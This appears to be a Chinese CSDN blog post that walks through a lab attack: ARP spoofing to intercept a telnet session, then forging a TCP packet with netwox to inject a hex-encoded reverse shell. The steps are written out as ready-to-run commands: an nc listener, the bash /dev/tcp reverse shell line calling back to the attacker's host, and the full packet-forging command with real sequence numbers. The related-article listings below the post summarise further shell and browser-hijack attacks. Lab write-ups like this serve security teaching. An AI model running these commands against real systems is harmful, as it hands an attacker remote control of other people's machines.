TCP劫持及反弹shell攻击

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量979 收藏 1
点赞数
文章标签: tcp/ip 网络 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44418623/article/details/128007757
版权

TCP劫持及反弹shell攻击

0.实验环境

server 192.168.88.137

client 192.168.88.131

kali 192.168.88.133

1.ARP攻击 劫持流量

参照之前的实验不过多赘述

2.观察流量

读到 src_port、seq、ack 如何具体取值请看 4.注.3

注:seq、ack值 在取值之前需要设置

1.右键选中一个tcp流量

2.按照图示 将光标处的选项取消勾选

3.开启监听

nc -lvvp 9999

表示监听本机9999端口

4.构造payload

1.构造shellcode

bash -i>&/dev/tcp/192.168.88.133/9999 0>&1

经典反弹shell命令

使用cyberchef,tohex

62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e2631

记得加 0d00

其中 0x0d为回车 0x00 为空字符 目的截断

最后的shellcode为

62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e26310d00

2.构造攻击命令

sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src {client} --ip4-dst {server} --tcp-src {src_port} --tcp-dst 23 --tcp-seqnum {ack} --tcp-acknum {seq} --tcp-ack --tcp-psh --tcp-window 227 --tcp-data {shellcode}

注:

​ 1. ack、seq一定要反着来,别问为什么,问就去补tcp/ip工作原理吧!

​ 2.{name}:获取变量名为name的值 熟悉python的同学很了解吧

​ 3.由于处于ARP欺骗中,不要看错包

在这里插入图片描述

​ 这四个包为一组 后两个包为确认收到的包

​ 所以src_port、seq、ack应从前两个包中取 不然又反了。。。(视频前两次失败的原因就在这,懒得补录了。。。)

在这里插入图片描述

​ src_port 即 41450

​ seq 即 2818841513

​ ack 即 3893561905

eg:

sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.88.131 --ip4-dst 192.168.88.137 --tcp-src 47740 --tcp-dst 23 --tcp-seqnum 3035401169 --tcp-acknum 1050352061 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e26310d00

执行即可拿到shell

备注

本次实验基于telnet

使实验成为可能主要原因:1.劫持流量 2.telnet为明文传输

所以不能使用ssh进行本次实验 原因:ssh使用密文传输,不是说不能打而是条件苛刻。

关于ubuntu 20.04 LTS 如何开启telnet

劫持流量 2.telnet为明文传输

所以不能使用ssh进行本次实验 原因:ssh使用密文传输,不是说不能打而是条件苛刻。

关于ubuntu 20.04 LTS 如何开启telnet

参考了解决Ubuntu中telnet 127.0.0.1时Unable to connect to remote host: Connection refused的问题

247533
关注
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
网络知识--2.TCP三次握手与四次挥手
liqun3yue25的专栏
03-06 242
TCP是主机对主机层的传输控制协议,提供可靠的连接服务,采用三次握手确认建立一个连接: 位码即tcp标志位,有6种标示: SYN(synchronous建立联机) ACK(acknowledgement 确认) PSH(push传送) FIN(finish结束) RST(reset重置) URG(urgent紧急) Sequence number(顺序号码) Acknowl...
shell防止黑客攻击
ZZULI_Lucas的博客
11-06 433
shell防止黑客攻击 #!bin/bash #******************************************************************** while : ;do iplist=`who | sed -rn '/^cracker/s/.*\((.*)\)/\1/p'` #取出以cracker开头的黑客IP地址 i...
TCP劫持下的反弹Shell注入攻击
Hala
03-16 1289
反弹Shell的注入 思路: 通过劫持Server与数据Server的TCP报文,并伪造成Server,向其注入反弹Shell,使攻击者获得对数据Server的完全控制,窃取数据 全局模式下测试: 攻击者Kali监听这个10000端口 $ nc -lp 10000 -vvv 数据Server跟Kali进行TCP会话的建立 # bash -i>&...
shell解决访问攻击
LINU_BW的专栏
12-13 490
两种方法实现 解决DOS攻击生产案例 提示:根据web日志或者网络连接数,监控当某个IP并发连接数或者段时间内PV连接到达100及使用防火墙命令封堵对应的IP,监控频率每隔3分钟;防火墙命令为:iptables -A  INPUT -s 192.168.0.7  -j DROP 查看防火墙iptables -L -n 第一种:监控日志 #!/bin/sh while true do ...
网络安全&TCP劫持实现反弹shell
✍千里之行,始于足下 ^,^
03-20 1786
TCP劫持实现反弹shell实验环境:TCP劫持反弹shell反弹shell的原理:1. 关于反弹shell2. 反弹shell的原因实验过程1.获取数据包2.模拟产生TCP会话3.在kali上抓取数据包4.利用netwox工具伪造包配置示例:反射shell语句字符转换5.开启端口监视6.攻击 实验环境: 1.kali linux ;kali linux 介绍 2.ubuntu虚拟机 两台 //...
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
热门推荐
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
漏洞分析TCP/IP Attack Lab(自用,记录)
weixin_48392428的博客
07-06 3197
TCP/IP Attack Lab1 Lab Overview2 Lab Environment2.1 Environment Setup2.2 Note for Instructors(就是一些介绍,可以忽略)3 Lab Tasks3.1 Task 1 : SYN Flooding Attack3.2 Task 2 : TCP RST Attacks on telnet and ssh Connections3.3 Task 3 : TCP RST Attacks on Video Streaming A
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 4613
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
TCP(ddos攻击研究
03-10
TCP(ddos攻击研究
Shell脚本防攻击一例
soyo的专栏
06-05 134
http://yaozb.blog.51cto.com/2762349/882176               不知道得罪了哪路神仙,收到nagios报警,发现有个网站有CC攻击。看样子,量还不小,把服务器的负载都弄到40+了,虽然网站还能打开,但打开也是非常的缓慢。如果不是配置高点,估计服务器早就挂掉了。看来又是不一个不眠之夜了。 迅速查看一下nginx的访问日志: #tai...
webshell攻与防
Sumarua的博客
07-25 1833
最近几个月中,参加过很多webshell检测的比赛,有我们内部的,也有其他厂商的,平心而论,TSRC和 青藤云针对webshell|文件的检测思路和实现成熟度是业界领先的,使用动静态污点分析webshell文件,已经是非常高级的检测手段,大家如果不熟悉原理的话,可以看这篇文章:主机安全–洋葱Webshell检测实践与思考 虽然做webshell弓|擎绕过时间不长,但是总结出.了一套自己的方法论,本篇内容会给出我的思考方式,包括针对webshell文件 多种检测手段的攻防总结,而不会直接给- -个通用的web
TCP劫持
chenyijun的专栏
10-13 9469
http://www.pediy.com/kssd/pediy12/133433.html 此文自http://www.techrepublic.com/article/TCP-hijacking/5033594翻译而来,文章在翻译过程中根据译者个人理解有轻微改动。文章著作权归原作者所有,译者只保留中文著作权。本文只作为技术讨论之用,如因使用文中提到的技术而导致的任何良性和不良后果,本文
什么是流量劫持,如何防止流量劫持
weixin_33778544的博客
08-01 450
流量劫持,是利用各种恶意软件修改浏览器、锁定主页或不停弹出新窗口,强制用户访问某些网站,从而造成用户流量损失的情形。流量劫持是一种古老的攻击方式,比如早已见惯的广告弹窗(如下图)等,很多人已经对此麻木,并认为流量劫持不会造成什么损失。而事实上,流量劫持可以通过多种你无法觉察的方式窃取信息! HTTP协议缺陷,使流量劫持得以实现 流量劫持的方式有很多种,...
linux脚本攻击,恶意shell脚本攻击的方法与预防策略
weixin_26837345的博客
05-01 2632
前言网络安全对于互联网从业者而言,一直是一个重要的、绕不开的话题,PowerShell可以给运维人员带来极大的方便,但同时也是被攻击者盯上的重灾区。想想就非常可怕,攻击的人只要能从远程执行shell脚本,就能执行一些敏感的安全操作,比如篡改重要数据,修改安全配置等。所以我们有必要掌握一些恶意shell脚本攻击的方法与预防策略。PowerShell攻击方法PowerShell攻击方法一般分为两方面:...
运营商流量劫持
sicceer的专栏
08-05 9473
最近了解了一下运营商流量劫持,文章很多,但感觉很零碎,在这里把众多文章内容串一下,清晰一下思路。下面多是引用,引文在附录里,就不一一标识了。对于传统的流量劫持请见引文1,这里不作介绍。 运营商流量劫持主要包括四种: DNS劫持、HTTP重定向、TCP注入、网络直投​ 1. ​DNS劫持 ​    此方式太过暴露,运营商都放弃了这种方式,原理不再赘述。 2. HTTP重定向
shell实例浅谈之五解决网络中DOS攻击的方法
乌托邦
10-13 3048
一、问题       写 二、解决 1、shell脚本 利用管道组成的一条命令: #查找文本中n个出现频率最高的单词 #!/bin/bash count=$1 #$1是输出频率最高单词的个数 cat $2 | #$2是目标文本文件名称也可是是字符串 tr -cs "[a-z]
TCP劫持和流量分析
f_zhangwuji的博客
09-22 462
TCP劫持和流量分析 实验过程:客户机(192.168.16.129)telnet服务机(192.168.16.142),通过kali上的netwox(有的版本没有可以apt-get安装)进行tcp劫持。 1.客户机telnet服务机 数据流中可以看到命令。 2. 上图标记的645包为我构造数据包之前最后一条数举包,根据该包构造新数据包685 可以看到成功发送且客户机窗口多了我们刚刚构造数据包中的命令 3 客户机telnet窗口失去控制,随后断开。 正常流中包含命令的数据都会双向发送,构造的数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值